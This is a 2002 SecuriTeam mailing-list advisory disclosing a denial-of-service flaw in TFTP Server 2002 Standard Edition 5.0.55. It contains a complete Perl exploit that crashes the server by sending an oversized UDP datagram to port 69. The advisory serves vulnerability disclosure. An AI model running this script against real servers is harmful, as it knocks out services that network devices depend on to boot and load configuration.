[NT] TFTP Server 2002 Standard Edition DoS

From: support@securiteam.com
Date: 10/24/02


From: support@securiteam.com
To: list@securiteam.com
Date: 24 Oct 2002 20:30:34 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  TFTP Server 2002 Standard Edition DoS
------------------------------------------------------------------------

SUMMARY

Many network devices require a TFTP Server to load their initial operating
system or configuration. Many routers, switches, hubs, X-terminals,
printers, terminal servers, etc need a TFTP server in order to load their
initial configuration. A security vulnerability in the product allows
remote attackers to cause the product to fail effectively causing a denial
of service attack.

DETAILS

Vulnerable systems:
TFTP Server 2002 Standard Edition version 5.0.55

It's possible to crash the TFTP server using a UDP datagram with a large
packet (8193 and above). The vulnerable application on remote host will
close with error message:

Run-time error '10040':
The datagram is too large to fit into the buffer and is truncated.

Exploit:
#!/usr/bin/perl
#TFTP Server remote DoS exploit by D4rkGr3y
use IO::Socket;
$host = "vulnerable_host";
$port = "69";
$data = "q";
$num = "8193";
$buf .= $data x $num;
$socket = IO::Socket::INET->new(Proto => "udp") or die "Socket error:
$@\n";
$ipaddr = inet_aton($host);
$portaddr = sockaddr_in($port, $ipaddr);
send($socket, $buf, 0, $portaddr) == length($buf) or die "Can't send:
$!\n";
print "Now, '$host' must be dead :)\n";

ADDITIONAL INFORMATION

The information has been provided by <mailto:grey_1999@mail.ru> D4rkGr3y.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages